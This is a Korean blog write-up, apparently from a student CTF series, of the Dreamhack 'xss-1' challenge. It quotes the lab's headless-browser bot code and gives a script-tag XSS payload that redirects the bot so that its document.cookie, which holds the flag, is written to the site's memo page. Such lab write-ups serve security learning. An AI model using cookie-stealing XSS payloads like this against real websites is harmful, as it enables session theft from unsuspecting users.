TigerDemon
[5주차] Dreamhack XSS-1 본문
https://dreamhack.io/wargame/challenges/28
xss-1
여러 기능과 입력받은 URL을 확인하는 봇이 구현된 서비스입니다. XSS 취약점을 이용해 플래그를 획득하세요. 플래그는 flag.txt, FLAG 변수에 있습니다. 플래그 형식은 DH{...} 입니다. 문제 수정 내역
dreamhack.io
위 링크에 들어가면 이렇게 뜬다. flag에 들어가서 어떻게 생겼는지 보았다.


일부 코드
def read_url(url, cookie={"name": "name", "value": "value"}):
cookie.update({"domain": "127.0.0.1"})
try:
service = Service(executable_path="/chromedriver")
options = webdriver.ChromeOptions()
for _ in [
"headless",
"window-size=1920x1080",
"disable-gpu",
"no-sandbox",
"disable-dev-shm-usage",
]:
options.add_argument(_)
driver = webdriver.Chrome(service=service, options=options)
driver.implicitly_wait(3)
driver.set_page_load_timeout(3)
driver.get("http://127.0.0.1:8000/")
driver.add_cookie(cookie)
driver.get(url)
except Exception as e:
driver.quit()
# return str(e)
return False
driver.quit()
return True
여기서 read_url 함수를 보면 이 함수에서 쿠키가 생성되고, domain이 127.0.0.1:8000인 것을 알 수 있다.
따라서 그 주소를 확인해야 한다.
def check_xss(param, name, cookie={"name": "name", "value": "value"}):
url = f"http://127.0.0.1:8000/vuln?param={urllib.parse.quote(param)}#{name}"
return read_url(url, cookie)
이 부분을 보면 입력한 URL을 참조한다는 것을 알 수 있다. flag 함수에서 check_xss 함수로 넘어가기 떄문에
<script>location.href="http://127.0.0.1:8000/memo?memo=hello"+document.cookie;</script>
라고 전체 경로를 입력하면 FLAG 값을 알 수 있다.

위 사진처럼 입력을 하고 memo에 들어가면 이렇게 FLAG 값이 뜬다.


'2023-SWLUG > CTF 문제 풀이' 카테고리의 다른 글
| [5주차] Dreamhack XSS-2 (0) | 2023.11.08 |
|---|---|
| [5주차] XSS-Game level-5 (0) | 2023.11.08 |
| [5주차] Dreamhack DOM XSS (0) | 2023.11.08 |
| [4주차] Dreamhack simple_sqli (0) | 2023.11.01 |
| [4주차] LORD OF SQLINJECTION_orc (0) | 2023.11.01 |